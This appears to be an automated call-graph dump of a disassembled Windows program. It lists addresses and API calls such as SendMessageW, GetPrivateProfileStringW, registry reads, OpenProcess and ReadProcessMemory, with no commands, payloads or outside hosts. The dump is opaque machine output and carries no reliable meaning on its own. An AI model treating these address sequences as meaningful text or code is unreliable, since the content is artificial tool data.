4519->4518 4520 407185 4519->4520 4521 407183 4519->4521 4522 4058b8 SendMessageW 4520->4522 4521->4462 4523 407192 SendMessageW 4522->4523 4524 4058b8 SendMessageW 4523->4524 4524->4521 4525->4462 4526->4487 4527->4489 4528->4494 4529->4496 4530->4498 4532 402769 4531->4532 4535 402781 4531->4535 4534 402787 4532->4534 4532->4535 4537 40235c SendMessageW 4532->4537 4534->4535 4538 4024c2 SendMessageW 4534->4538 4535->4519 4537->4532 4538->4535 4539 40ba60 4540 40ba70 4539->4540 4541 40ba69 ??3@YAXPAX 4539->4541 4541->4540 4542 4020e0 4543 4020ec 4542->4543 4545 4020f9 4542->4545 4550 403992 wcslen WriteFile 4543->4550 4548 402111 4545->4548 4551 403992 wcslen WriteFile 4545->4551 4552 403992 wcslen WriteFile 4548->4552 4549 402130 4550->4545 4551->4548 4552->4549 3822 40a7e6 FindResourceW 3823 40a7ff SizeofResource 3822->3823 3826 40a829 3822->3826 3824 40a810 LoadResource 3823->3824 3823->3826 3825 40a81e LockResource 3824->3825 3824->3826 3825->3826 4553 403566 4554 4036ae 4553->4554 4555 40357e 4553->4555 4562 4036cb 4554->4562 4627 402882 4554->4627 4556 403686 SendDlgItemMessageW 4555->4556 4560 403589 4555->4560 4557 4033f1 13 API calls 4556->4557 4558 403681 4557->4558 4560->4558 4565 4035b3 4560->4565 4592 403325 GetDlgItem GetDlgItemInt 4560->4592 4561 4035f7 4566 403615 4561->4566 4567 40360a GetDlgItem 4561->4567 4562->4558 4563 403740 4562->4563 4632 40235c SendMessageW 4562->4632 4563->4558 4635 401337 GetDlgItem EnableWindow 4563->4635 4565->4558 4565->4561 4596 4033f1 GetDlgItem SendMessageW SendMessageW 4565->4596 4571 403628 4566->4571 4572 40361d GetDlgItem 4566->4572 4607 402639 SendMessageW 4567->4607 4574 40363e 4571->4574 4575 403630 GetDlgItem 4571->4575 4612 40267c SendMessageW 4572->4612 4573 403702 4573->4563 4633 401337 GetDlgItem EnableWindow 4573->4633 4580 403656 4574->4580 4581 403648 GetDlgItem 4574->4581 4617 4026b8 SendMessageW 4575->4617 4585 403665 EndDialog 4580->4585 4586 40366c 4580->4586 4584 4026b8 3 API calls 4581->4584 4582 40376b 4636 401337 GetDlgItem EnableWindow 4582->4636 4583 403726 4634 401337 GetDlgItem EnableWindow 4583->4634 4584->4580 4585->4586 4586->4558 4622 40337d GetDlgItem 4586->4622 4589 403787 SetDlgItemInt 4589->4558 4593 403359 4592->4593 4595 403367 4592->4595 4594 4027b9 SendMessageW 4593->4594 4594->4595 4595->4565 4597 403430 SendMessageW 4596->4597 4597->4597 4598 403440 4597->4598 4599 4023a5 2 API calls 4598->4599 4604 403457 4599->4604 4600 403546 4641 402336 SendMessageW 4600->4641 4602 403553 SetFocus 4602->4561 4603 40348a memset SendMessageW 4603->4604 4604->4600 4604->4603 4637 402428 4604->4637 4640 40280a SendMessageW 4604->4640 4608 402678 4607->4608 4610 402657 4607->4610 4608->4566 4610->4608 4642 40235c SendMessageW 4610->4642 4643 402518 4610->4643 4613 402695 4612->4613 4614 4026b4 4613->4614 4616 402518 7 API calls 4613->4616 4657 40235c SendMessageW 4613->4657 4614->4571 4616->4613 4618 4026fd 4617->4618 4620 4026d4 4617->4620 4618->4574 4620->4618 4658 40235c SendMessageW 4620->4658 4659 40280a SendMessageW 4620->4659 4623 4033ed EndDialog 4622->4623 4625 4033a5 4622->4625 4623->4558 4624 402374 SendMessageW 4624->4625 4625->4623 4625->4624 4660 4027ed SendMessageW 4625->4660 4661 4027ed SendMessageW 4627->4661 4629 40288f 4662 40280a SendMessageW 4629->4662 4631 4028a2 4631->4562 4632->4573 4633->4583 4634->4563 4635->4582 4636->4589 4638 402459 SendMessageW 4637->4638 4639 40244f wcslen 4637->4639 4638->4604 4639->4638 4640->4604 4641->4602 4642->4610 4644 402525 4643->4644 4655 4024c2 SendMessageW 4644->4655 4646 402557 4656 4024c2 SendMessageW 4646->4656 4648 40256e 4649 402635 4648->4649 4650 402583 SendMessageW SendMessageW 4648->4650 4649->4610 4651 4024fd 2 API calls 4650->4651 4654 4025bf 4651->4654 4652 4028a6 SendMessageW 4652->4654 4653 40283d SendMessageW 4653->4654 4654->4649 4654->4652 4654->4653 4655->4646 4656->4648 4657->4613 4658->4620 4659->4620 4660->4625 4661->4629 4662->4631 4663 401566 4664 401570 4663->4664 4665 403ffe 5 API calls 4664->4665 4666 40157f 4665->4666 4667 407067 4668 4070f6 4667->4668 4673 40707d 4667->4673 4669 4070b5 _wcsicmp 4669->4673 4670 4070ae wcscmp 4670->4673 4672 403a94 3 API calls 4672->4673 4673->4668 4673->4669 4673->4670 4673->4672 4674 403a3c wcslen wcslen 4673->4674 4675 403a87 4674->4675 4677 403a63 4674->4677 4675->4673 4676 403a6b memcmp 4676->4675 4676->4677 4677->4675 4677->4676 4678 40636b 4679 40636d 4678->4679 4682 403eeb 4679->4682 4683 403f01 4682->4683 4691 403efa 4682->4691 4692 403ec5 modf 4683->4692 4685 403f2c 4693 403ec5 modf 4685->4693 4687 403f8e 4694 403ec5 modf 4687->4694 4689 403fb8 4695 403ec5 modf 4689->4695 4692->4685 4693->4687 4694->4689 4695->4691 3827 40a86c EnumResourceNamesW 4696 404cec 4697 404d49 4696->4697 4698 404cfc GetParent GetWindowRect GetClientRect MapWindowPoints SetWindowPos 4696->4698 4698->4697 4699 40a56d 4700 40a60d memset memset memset _snwprintf _snwprintf 4699->4700 4701 40a58d memset memset _snwprintf _snwprintf 4699->4701 4702 40a608 4700->4702 4701->4702 4703 4016ee 4704 4016fa 4703->4704 4705 4047ef 4 API calls 4704->4705 4706 40171a 4704->4706 4705->4706 4707 40326f 4708 403280 BeginDeferWindowPos 4707->4708 4709 4032e8 4707->4709 4720 4015c8 GetDlgItem GetClientRect 4708->4720 4714 4032f6 4709->4714 4724 401668 6 API calls 4709->4724 4713 4015c8 3 API calls 4715 4032b5 4713->4715 4716 4015c8 3 API calls 4715->4716 4717 4032c2 4716->4717 4718 4015c8 3 API calls 4717->4718 4719 4032d0 EndDeferWindowPos InvalidateRect 4718->4719 4719->4714 4721 4015fc 4720->4721 4722 401611 DeferWindowPos 4721->4722 4723 40165b 4721->4723 4722->4723 4723->4713 4724->4714 4725 40146f 4726 404b45 GetModuleHandleW 4725->4726 4727 401488 CreateDialogParamW 4726->4727 4728 404dfe 7 API calls 4727->4728 4729 401499 4728->4729 4730 4014a1 ShowWindow UpdateWindow 4729->4730 4731 4030f0 4732 403109 4731->4732 4745 40318d 4731->4745 4735 40311b memset 4732->4735 4732->4745 4736 4049df 16 API calls 4735->4736 4737 403142 4736->4737 4738 4049df 16 API calls 4737->4738 4739 403152 4738->4739 4740 4043c3 6 API calls 4739->4740 4741 40316d 4740->4741 4742 4049df 16 API calls 4741->4742 4743 403177 4742->4743 4746 4041a0 4743->4746 4750 40151c 4745->4750 4747 4041f0 4746->4747 4748 404204 4747->4748 4749 4041f4 wcscpy 4747->4749 4748->4745 4749->4745 4751 401550 4750->4751 4752 401529 4750->4752 4752->4751 4753 401540 EndDialog 4752->4753 4753->4751 3336 40b772 3355 40b984 3336->3355 3338 40b77e GetModuleHandleA 3341 40b78e __set_app_type __p__fmode __p__commode 3338->3341 3340 40b822 3342 40b836 3340->3342 3343 40b82a __setusermatherr 3340->3343 3341->3340 3356 40b96e _controlfp 3342->3356 3343->3342 3345 40b83b _initterm __wgetmainargs _initterm 3346 40b89c GetStartupInfoW 3345->3346 3347 40b88e 3345->3347 3349 40b8e4 GetModuleHandleA 3346->3349 3357 408d32 3349->3357 3353 40b914 exit 3354 40b91b _cexit 3353->3354 3354->3347 3355->3338 3356->3345 3398 4022b7 LoadLibraryW 3357->3398 3359 408d46 3360 408d4a 3359->3360 3407 40aab1 3359->3407 3360->3353 3360->3354 3369 408df3 3463 40558e memset 3369->3463 3370 408e3d 3444 4053f0 memset 3370->3444 3373 408e02 ??3@YAXPAX 3375 408f92 3373->3375 3376 408e24 DeleteObject 3373->3376 3469 404485 free free 3375->3469 3376->3375 3377 4047a0 _wcsicmp 3380 408e53 3377->3380 3379 408fa3 3470 4048ec 3379->3470 3380->3373 3382 408e71 CoInitialize 3380->3382 3449 408c56 3380->3449 3468 408a4c GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 3382->3468 3386 408e81 6 API calls 3390 408f5a CoUninitialize ??3@YAXPAX 3386->3390 3391 408eec 3386->3391 3390->3375 3393 408f7e DeleteObject 3390->3393 3392 408ef2 TranslateAcceleratorW 3391->3392 3395 408f24 IsDialogMessageW 3391->3395 3396 408f18 IsDialogMessageW 3391->3396 3392->3391 3394 408f4c GetMessageW 3392->3394 3393->3375 3394->3390 3394->3392 3395->3394 3397 408f36 TranslateMessage DispatchMessageW 3395->3397 3396->3394 3396->3395 3397->3394 3399 4022e2 GetProcAddress 3398->3399 3400 40230a 6F551CD0 3398->3400 3401 4022f2 3399->3401 3402 4022fb FreeLibrary 3399->3402 3403 402313 3400->3403 3401->3402 3402->3400 3404 402306 3402->3404 3405 402331 3403->3405 3406 40231a MessageBoxW 3403->3406 3404->3403 3405->3359 3406->3359 3408 40aaba LoadLibraryW 3407->3408 3409 408d55 SetErrorMode GetModuleHandleW EnumResourceTypesW 3407->3409 3408->3409 3410 40aace GetProcAddress 3408->3410 3411 408ac8 ??2@YAPAXI 3409->3411 3410->3409 3412 408af4 ??2@YAPAXI 3411->3412 3414 408b18 3412->3414 3419 408b1d 3412->3419 3482 4056f8 3414->3482 3416 408b64 3474 403dbc 3416->3474 3417 408b57 DeleteObject 3417->3416 3419->3416 3419->3417 3420 408b69 3477 401000 3420->3477 3424 408bb7 3425 404633 3424->3425 3494 404485 free free 3425->3494 3427 404784 3495 40459c 3427->3495 3430 404566 malloc memcpy free free 3432 40466e 3430->3432 3431 40475b 3431->3427 3516 404566 3431->3516 3432->3427 3432->3430 3432->3431 3434 404700 3432->3434 3435 4046f7 free 3432->3435 3498 4044ab wcslen 3432->3498 3434->3432 3508 403c2b 3434->3508 3435->3432 3439 4044ab 7 API calls 3439->3427 3440 4047a0 3442 4047bf 3440->3442 3443 4047a8 3440->3443 3442->3369 3442->3370 3443->3442 3522 4047ca 3443->3522 3525 405567 3444->3525 3446 405420 3530 405368 3446->3530 3545 401dc8 3449->3545 3451 408d28 3451->3373 3451->3382 3452 408ca7 _wcsicmp 3453 408c6e 3452->3453 3453->3451 3453->3452 3455 408cda 3453->3455 3587 408bc0 _wcsicmp 3453->3587 3455->3451 3548 408150 3455->3548 3459 408cf0 3460 406eee 18 API calls 3459->3460 3461 408d19 3460->3461 3462 408409 12 API calls 3461->3462 3462->3451 3464 405567 3 API calls 3463->3464 3465 4055c1 GetModuleHandleW 3464->3465 3733 40542e 3465->3733 3468->3386 3469->3379 3471 4048f2 free 3470->3471 3472 4048f9 3470->3472 3471->3472 3473 404485 free free 3472->3473 3473->3360 3492 403d15 memset wcscpy 3474->3492 3476 403dd3 CreateFontIndirectW 3476->3420 3478 401037 3477->3478 3479 40103b GetModuleHandleW LoadIconW 3478->3479 3480 40100e wcsncat 3478->3480 3481 4016d1 wcscpy 3479->3481 3480->3478 3481->3424 3493 4040ca memset 3482->3493 3484 40570b ??2@YAPAXI 3485 405725 ??2@YAPAXI 3484->3485 3487 405746 ??2@YAPAXI 3485->3487 3489 405767 ??2@YAPAXI 3487->3489 3491 405788 3489->3491 3491->3419 3492->3476 3493->3484 3494->3432 3496 4045a2 free 3495->3496 3497 4045ac 3495->3497 3496->3497 3497->3440 3499 4044e2 3498->3499 3500 4044d9 free 3498->3500 3502 403c2b 3 API calls 3499->3502 3501 4044ec 3500->3501 3503 404505 3501->3503 3504 4044fc free 3501->3504 3502->3501 3506 403c2b 3 API calls 3503->3506 3505 404511 memcpy 3504->3505 3505->3432 3507 404510 3506->3507 3507->3505 3509 403c78 3508->3509 3510 403c32 3508->3510 3509->3434 3510->3510 3511 403c41 malloc 3510->3511 3512 403c53 3511->3512 3513 403c6e 3511->3513 3514 403c67 free 3512->3514 3515 403c57 memcpy 3512->3515 3513->3434 3514->3513 3515->3514 3517 404574 free 3516->3517 3518 40457f 3516->3518 3519 40458b 3517->3519 3520 403c2b 3 API calls 3518->3520 3519->3439 3521 40458a 3520->3521 3521->3519 3523 4047cf 3522->3523 3524 4047db _wcsicmp 3523->3524 3524->3443 3540 403ce2 GetModuleFileNameW 3525->3540 3527 40556d wcsrchr 3528 405580 wcscat 3527->3528 3529 40557c 3527->3529 3528->3446 3529->3528 3541 403cb3 GetFileAttributesW 3530->3541 3532 405371 3533 405376 wcscpy wcscpy GetPrivateProfileIntW 3532->3533 3539 4053ea 3532->3539 3542 404f08 GetPrivateProfileStringW 3533->3542 3535 4053c5 3543 404f08 GetPrivateProfileStringW 3535->3543 3537 4053d6 3544 404f08 GetPrivateProfileStringW 3537->3544 3539->3377 3540->3527 3541->3532 3542->3535 3543->3537 3544->3539 3600 4059c1 3545->3600 3549 40816d memset 3548->3549 3575 40831d 3548->3575 3640 403ce2 GetModuleFileNameW 3549->3640 3551 408195 wcsrchr 3552 4081aa 3551->3552 3553 4081ad wcscat 3551->3553 3552->3553 3641 40a6a8 wcscpy wcscpy 3553->3641 3562 408230 memset 3662 40aae0 3562->3662 3565 408285 3675 403e17 wcscpy 3565->3675 3566 408298 3678 403cb3 GetFileAttributesW 3566->3678 3569 4082af 3570 4082ce wcslen wcslen 3569->3570 3569->3575 3571 4082f3 3570->3571 3572 408306 3570->3572 3573 403e17 4 API calls 3571->3573 3679 403cb3 GetFileAttributesW 3572->3679 3573->3572 3576 4078e5 3575->3576 3577 40794b 3576->3577 3583 4078f9 3576->3583 3721 4038b4 LoadCursorW SetCursor 3577->3721 3578 4047ca _wcsicmp 3578->3583 3580 407950 3581 4047a0 _wcsicmp 3580->3581 3585 407974 3581->3585 3582 4079bc 3583->3577 3583->3578 3711 4074aa 3583->3711 3585->3582 3586 4079b3 qsort 3585->3586 3586->3582 3588 408bd1 3587->3588 3589 408bd5 _wcsicmp 3587->3589 3588->3453 3590 408be6 3589->3590 3591 408bea _wcsicmp 3589->3591 3590->3453 3592 408bfb 3591->3592 3593 408bff _wcsicmp 3591->3593 3592->3453 3594 408c10 3593->3594 3595 408c14 _wcsicmp 3593->3595 3594->3453 3596 408c25 3595->3596 3597 408c29 _wcsicmp 3595->3597 3596->3453 3598 408c3a 3597->3598 3599 408c3e _wcsicmp 3597->3599 3598->3453 3599->3453 3601 4059d2 3600->3601 3613 4057a2 3601->3613 3604 405a2e memcpy memcpy 3605 405a79 3604->3605 3605->3604 3606 405ab4 ??2@YAPAXI ??2@YAPAXI 3605->3606 3607 4049df 16 API calls 3605->3607 3608 405af0 ??2@YAPAXI 3606->3608 3610 405b27 3606->3610 3607->3605 3608->3610 3610->3610 3623 405941 3610->3623 3612 401dd7 3612->3453 3614 4057b4 3613->3614 3615 4057ad ??3@YAXPAX 3613->3615 3616 4057c2 3614->3616 3617 4057bb ??3@YAXPAX 3614->3617 3615->3614 3618 4057d3 3616->3618 3619 4057cc ??3@YAXPAX 3616->3619 3617->3616 3620 4057f3 ??2@YAPAXI ??2@YAPAXI 3618->3620 3621 4057e3 ??3@YAXPAX 3618->3621 3622 4057ec ??3@YAXPAX 3618->3622 3619->3618 3620->3604 3621->3622 3622->3620 3624 40459c free 3623->3624 3625 40594a 3624->3625 3626 40459c free 3625->3626 3627 405952 3626->3627 3628 40459c free 3627->3628 3629 40595a 3628->3629 3630 40459c free 3629->3630 3631 405962 3630->3631 3632 404566 4 API calls 3631->3632 3633 405975 3632->3633 3634 404566 4 API calls 3633->3634 3635 40597f 3634->3635 3636 404566 4 API calls 3635->3636 3637 405989 3636->3637 3638 404566 4 API calls 3637->3638 3639 405993 3638->3639 3639->3612 3640->3551 3642 4081ed 3641->3642 3643 40a6d6 CreateFileW CloseHandle 3641->3643 3644 401c4e 3642->3644 3643->3642 3645 401c64 3644->3645 3680 40a764 3645->3680 3648 4017c3 3649 4017f4 memset 3648->3649 3650 4017d4 3648->3650 3651 401807 3649->3651 3650->3651 3652 4017de GetWindowPlacement 3650->3652 3653 401822 3651->3653 3654 401827 3651->3654 3652->3651 3684 40182a 3653->3684 3656 4058d5 3654->3656 3657 4058f2 3656->3657 3658 4058e4 3656->3658 3660 40593e 3657->3660 3696 4055d7 3657->3696 3691 405672 3658->3691 3660->3562 3660->3575 3663 40aab1 2 API calls 3662->3663 3664 40aaef 3663->3664 3665 40aaf9 3664->3665 3666 40ab0b memset 3664->3666 3701 403de2 3665->3701 3704 40a4dd RegOpenKeyExW 3666->3704 3669 408257 wcslen wcslen 3669->3565 3669->3566 3670 40ab32 3671 40ab39 wcscpy 3670->3671 3672 40ab6c wcscpy 3670->3672 3705 40a4f8 RegQueryValueExW 3671->3705 3672->3669 3707 4039b6 wcslen 3675->3707 3678->3569 3679->3575 3681 40a786 GetPrivateProfileStringW 3680->3681 3682 40a777 WritePrivateProfileStringW 3680->3682 3683 401cb7 3681->3683 3682->3683 3683->3648 3685 40183d 3684->3685 3686 4018bc 3684->3686 3685->3686 3687 401870 GetSystemMetrics 3685->3687 3686->3654 3687->3686 3688 401881 GetSystemMetrics 3687->3688 3688->3686 3689 40188f 3688->3689 3689->3686 3690 40189b SetWindowPlacement 3689->3690 3690->3686 3692 405681 memset 3691->3692 3693 4056d8 3691->3693 3692->3693 3694 405698 SendMessageW 3692->3694 3693->3657 3695 4056c3 3694->3695 3695->3693 3695->3694 3697 40566a 3696->3697 3698 4055e9 3696->3698 3697->3660 3698->3697 3700 4023ee SendMessageW 3698->3700 3700->3698 3702 403df1 GetVersionExW 3701->3702 3703 403e02 3701->3703 3702->3703 3703->3669 3704->3670 3706 40a51d RegCloseKey 3705->3706 3706->3672 3708 4039c1 3707->3708 3709 4039d6 wcscat 3707->3709 3708->3709 3710 4039c9 wcscat 3708->3710 3709->3566 3710->3709 3722 405bd5 ??2@YAPAXI 3711->3722 3713 4074ba 3714 407515 3713->3714 3715 4074d7 wcslen 3713->3715 3717 407525 _wcsicmp _wcsicmp 3714->3717 3720 407577 3714->3720 3715->3714 3716 4074e3 _wtoi 3715->3716 3718 4074f2 3716->3718 3717->3714 3718->3583 3719 403a94 wcslen wcslen _memicmp 3719->3720 3720->3718 3720->3719 3721->3580 3725 405c4e ??3@YAXPAX 3722->3725 3726 405c07 3722->3726 3725->3713 3726->3725 3727 405b9a 3726->3727 3728 405bc7 3727->3728 3730 405bac 3727->3730 3731 4028d2 SendMessageW 3728->3731 3730->3726 3732 402900 3731->3732 3732->3730 3752 40b9f0 3733->3752 3737 405484 3755 40b046 3737->3755 3740 4054a6 wcscpy 3741 4054bb wcscpy wcscpy 3740->3741 3784 404fa0 3741->3784 3744 404fa0 3 API calls 3745 4054fa 3744->3745 3746 404fa0 3 API calls 3745->3746 3747 405510 3746->3747 3748 404fa0 3 API calls 3747->3748 3749 405523 EnumResourceNamesW EnumResourceNamesW wcscpy 3748->3749 3790 405307 3749->3790 3753 40543b memset memset 3752->3753 3754 403ce2 GetModuleFileNameW 3753->3754 3754->3737 3757 40b061 3755->3757 3756 4054a2 3756->3740 3756->3741 3757->3756 3758 40b074 ??2@YAPAXI 3757->3758 3759 40b9e0 3758->3759 3760 40b08c 74D41560 3759->3760 3761 40b0a3 3760->3761 3762 40b0c9 74D41560 3760->3762 3761->3762 3763 40b0e0 _snwprintf 3762->3763 3764 40b118 wcscpy 3762->3764 3797 40afb7 wcscpy wcscat wcscat wcscat 74D41560 3763->3797 3766 40b128 3764->3766 3768 40afb7 9 API calls 3766->3768 3769 40b13a 3768->3769 3770 40afb7 9 API calls 3769->3770 3771 40b14f 3770->3771 3772 40afb7 9 API calls 3771->3772 3773 40b164 3772->3773 3774 40afb7 9 API calls 3773->3774 3775 40b179 3774->3775 3776 40afb7 9 API calls 3775->3776 3777 40b18e 3776->3777 3778 40afb7 9 API calls 3777->3778 3779 40b1a3 3778->3779 3780 40afb7 9 API calls 3779->3780 3781 40b1b8 3780->3781 3782 40afb7 9 API calls 3781->3782 3783 40b1cd ??3@YAXPAX 3782->3783 3783->3756 3785 40b9f0 3784->3785 3786 404fad memset GetPrivateProfileStringW 3785->3786 3787 405007 WritePrivateProfileStringW 3786->3787 3788 404ffd 3786->3788 3789 405003 3787->3789 3788->3787 3788->3789 3789->3744 3791 40b9f0 3790->3791 3792 405314 memset 3791->3792 3793 405333 LoadStringW 3792->3793 3794 40534d 3793->3794 3794->3793 3796 405365 3794->3796 3810 405019 memset _itow 3794->3810 3796->3373 3798 40b03a 3797->3798 3799 40b01e 3797->3799 3798->3764 3798->3766 3803 403bfd wcslen 3799->3803 3801 40b032 3806 403c7c 3801->3806 3804 403c11 memcpy 3803->3804 3805 403c0e 3803->3805 3804->3801 3805->3804 3807 403c84 3806->3807 3808 403c8c lstrcpyW lstrlenW 3806->3808 3807->3807 3807->3808 3809 403ca0 3808->3809 3809->3798 3811 404fa0 3 API calls 3810->3811 3812 40504d 3811->3812 3812->3794 4757 4061f2 4758 406207 4757->4758 4759 40626e 4757->4759 4758->4759 4760 406215 memset 4758->4760 4761 406238 4760->4761 4761->4759 4762 40623c _snwprintf SendMessageW 4761->4762 4762->4759 4763 401df6 4764 401e02 strlen 4763->4764 4765 401e28 4763->4765 4767 40429d WriteFile 4764->4767 4767->4765 4768 40a6f8 WritePrivateProfileStringW 4769 401cfc 4770 401d4a 4769->4770 4771 401d12 4769->4771 4771->4770 4772 4049df 16 API calls 4771->4772 4772->4770 4773 40217e 4774 40636d 4773->4774 4775 403eeb modf 4774->4775 4776 40639a 4775->4776 4777 405202 4778 40520f 4777->4778 4779 405217 4778->4779 4784 405252 4778->4784 4780 404e81 2 API calls 4779->4780 4781 405222 LoadMenuW 4780->4781 4790 405052 4781->4790 4782 404e81 2 API calls 4785 405287 CreateDialogParamW memset GetWindowTextW 4782->4785 4784->4782 4789 4052e7 4784->4789 4787 4052d5 4785->4787 4785->4789 4788 404fa0 3 API calls 4787->4788 4788->4789 4791 40b9f0 4790->4791 4792 405062 GetMenuItemCount 4791->4792 4793 40513c DestroyMenu 4792->4793 4794 40507c memset GetMenuItemInfoW 4792->4794 4793->4789 4797 4050cd 4794->4797 4795 4050d4 wcschr 4795->4797 4796 405052 5 API calls 4796->4797 4797->4793 4797->4794 4797->4795 4797->4796 4798 405019 5 API calls 4797->4798 4798->4797 4799 40ba82 4800 40ba92 4799->4800 4801 40ba8b ??3@YAXPAX 4799->4801 4802 40baa2 4800->4802 4803 40ba9b ??3@YAXPAX 4800->4803 4801->4800 4804 40bab2 4802->4804 4805 40baab ??3@YAXPAX 4802->4805 4803->4802 4806 40bac2 4804->4806 4807 40babb ??3@YAXPAX 4804->4807 4805->4804 4807->4806 4808 406c03 memset memset 4815 403992 wcslen WriteFile 4808->4815 4810 406c50 4816 406327 wcscpy 4810->4816 4812 406c66 _snwprintf 4819 403992 wcslen WriteFile 4812->4819 4814 406c8e 4815->4810 4817 40633a 4816->4817 4818 40635e _wcslwr 4817->4818 4818->4812 4819->4814 4820 407483 4823 40748e 4820->4823 4822 4074a7 4823->4822 4824 4073db 4823->4824 4825 4073e8 memset memset 4824->4825 4826 40b9f0 4824->4826 4828 407439 4825->4828 4826->4825 4827 407478 4827->4823 4828->4827 4829 407470 _wcsicmp 4828->4829 4829->4827 4830 402183 4831 4049df 16 API calls 4830->4831 4832 40218c 4831->4832 4833 40608d 4835 4060a0 4833->4835 4834 40589e SendMessageW 4846 4060d5 4834->4846 4835->4834 4836 40616d 4838 40619d 4836->4838 4839 406189 4836->4839 4841 405d3e 3 API calls 4836->4841 4837 405eb9 SendMessageW 4837->4846 4839->4838 4843 4058b8 SendMessageW 4839->4843 4840 406138 4840->4836 4860 40600e 4840->4860 4841->4839 4842 4060f6 SendMessageW 4842->4846 4843->4838 4846->4837 4846->4840 4846->4842 4848 405f96 4846->4848 4854 405ef0 4846->4854 4849 405ffd 4848->4849 4851 405fa3 4848->4851 4849->4846 4851->4849 4852 405fce wcscmp 4851->4852 4866 4028a6 SendMessageW 4851->4866 4867 40283d SendMessageW 4851->4867 4852->4851 4855 405f02 4854->4855 4868 4024c2 SendMessageW 4855->4868 4857 405f5a 4859 405f8d 4857->4859 4869 402481 SendMessageW 4857->4869 4859->4846 4861 406020 4860->4861 4862 402428 2 API calls 4861->4862 4863 40607d 4862->4863 4864 405f96 3 API calls 4863->4864 4865 406087 4864->4865 4865->4840 4866->4851 4867->4851 4868->4857 4869->4859 4870 40218e 4871 40219e 4870->4871 4872 4021c4 memset memcpy wcscmp 4871->4872 4873 402215 4872->4873 4874 402208 4872->4874 4879 401a3a wcslen 4873->4879 4891 406271 4874->4891 4880 401bbb 4879->4880 4887 401a82 4879->4887 4881 401c39 4880->4881 4882 401bfa log log 4880->4882 4883 401c35 _wcsicmp 4881->4883 4884 401c3e free 4881->4884 4882->4883 4885 401c2c free 4882->4885 4883->4874 4884->4883 4885->4883 4887->4880 4888 401b2c abs 4887->4888 4889 40226f 4 API calls 4887->4889 4901 40226f 4887->4901 4888->4887 4890 401b5c abs 4889->4890 4890->4887 4892 4062a4 4891->4892 4896 406281 4891->4896 4893 4062c8 free 4892->4893 4894 4062ec 4892->4894 4897 4062fe 4893->4897 4898 403c2b 3 API calls 4894->4898 4895 4062d1 memcpy 4899 402267 4895->4899 4896->4892 4896->4895 4900 406308 memcpy 4897->4900 4898->4897 4900->4899 4902 40227a 4901->4902 4906 402298 4901->4906 4903 402282 free 4902->4903 4904 40228b 4902->4904 4903->4906 4905 403c2b 3 API calls 4904->4905 4905->4906 4906->4887 4907 409810 4908 40981d 4907->4908 4909 4098a6 4908->4909 4915 40982a 4908->4915 4910 403ffe 5 API calls 4909->4910 4912 4098ae 8 API calls 4910->4912 4911 409af1 4913 409975 4912->4913 4914 40998b ReadProcessMemory 4912->4914 4938 404106 memset 4913->4938 4918 4099a7 4914->4918 4919 4099ba 4914->4919 4915->4911 4916 40984e EndDialog 4915->4916 4920 40985b 4915->4920 4916->4920 4922 404106 5 API calls 4918->4922 4945 403e06 4919->4945 4920->4911 4924 409865 GetDlgItem SendMessageW SendMessageW SendMessageW 4920->4924 4922->4919 4924->4911 4926 4099c5 4948 409be7 4926->4948 4927 4099cc 4958 409b63 4927->4958 4930 4099ca 4931 4099e1 memset GetCurrentProcessId 4930->4931 4932 409a5a _snwprintf SetDlgItemTextW GetDlgItem SetFocus 4930->4932 4966 409d65 4931->4966 4932->4911 4935 409a1f memcpy 4935->4932 4936 409a40 4935->4936 4937 409a4b wcscpy 4936->4937 4937->4932 4939 404134 _snwprintf 4938->4939 4940 404166 4939->4940 4941 404159 wcscat 4939->4941 4942 404183 wcscat 4940->4942 4943 404176 wcscat 4940->4943 4941->4940 4942->4939 4944 40419b 4942->4944 4943->4942 4944->4914 4946 403de2 GetVersionExW 4945->4946 4947 403e0b 4946->4947 4947->4926 4947->4927 4949 409bf4 LoadLibraryW 4948->4949 4950 409c7d 4948->4950 4949->4950 4951 409c06 GetProcAddress 4949->4951 4950->4930 4952 409c1e GetProcAddress 4951->4952 4957 409c62 4951->4957 4954 409c2f GetProcAddress 4952->4954 4952->4957 4953 409c76 FreeLibrary 4953->4950 4955 409c40 GetProcAddress 4954->4955 4954->4957 4956 409c51 GetProcAddress 4955->4956 4955->4957 4956->4957 4957->4950 4957->4953 4959 409b6c GetModuleHandleW 4958->4959 4961 409bda 4958->4961 4960 409b7e GetProcAddress 4959->4960 4959->4961 4960->4961 4962 409b96 GetProcAddress 4960->4962 4961->4930 4962->4961 4963 409ba7 GetProcAddress 4962->4963 4963->4961 4964 409bb8 GetProcAddress 4963->4964 4964->4961 4965 409bc9 GetProcAddress 4964->4965 4965->4961 4967 409d75 4966->4967 4968 403e06 GetVersionExW 4967->4968 4969 409d83 4968->4969 4971 409d97 OpenProcess 4969->4971 4977 409ea8 4969->4977 4970 409a15 4970->4932 4970->4935 4971->4970 4979 409db2 4971->4979 4972 409f70 CloseHandle 4972->4970 4973 409dec memset memset 4973->4979 4974 409ef2 memset wcscpy 4975 409f85 memcpy 4974->4975 4975->4977 4977->4970 4977->4972 4977->4974 4979->4972 4979->4973 4980 409ea3 4979->4980 4981 409c7f 4979->4981 4997 409f85 4979->4997 4980->4972 4982 409c92 wcschr 4981->4982 4983 409c8f wcscpy 4981->4983 4982->4983 4985 409cb4 4982->4985 4995 409d60 4983->4995 4986 403a94 3 API calls 4985->4986 4987 409cc0 4986->4987 4988 409cca memset 4987->4988 4989 409d0c 4987->4989 5001 403e91 4988->5001 4991 409d12 memset 4989->4991 4992 409d57 wcscpy 4989->4992 4994 403e91 2 API calls 4991->4994 4992->4995 4993 409cef wcscpy wcscat 4993->4995 4996 409d37 memcpy wcscat 4994->4996 4995->4979 4996->4995 4998 409fc4 4997->4998 4999 409f95 4997->4999 4998->4979 4999->4998 5000 409fa3 memcpy 4999->5000 5000->4998 5002 403ea1 GetWindowsDirectoryW 5001->5002 5003 403eb2 wcscpy 5001->5003 5002->5003 5003->4993 3813 40a715 3816 40a4ac 3813->3816 3815 40a735 3817 40a4b8 3816->3817 3818 40a4ca GetPrivateProfileIntW 3816->3818 3821 40a3b9 memset _itow WritePrivateProfileStringW 3817->3821 3818->3815 3820 40a4c5 3820->3815 3821->3820 5004 406c97 memset memset 5005 406ce1 5004->5005 5006 406327 2 API calls 5005->5006 5007 406ced _snwprintf 5006->5007 5010 403992 wcslen WriteFile 5007->5010 5009 406d15 5010->5009 5011 40109f 5012 4010b7 5011->5012 5013 40127c 5011->5013 5016 40123d 5012->5016 5017 4010be 5012->5017 5014 4012b2 SetDlgItemTextW 5013->5014 5015 401286 GetDlgItem ShowWindow GetDlgItem ShowWindow 5013->5015 5020 4012c5 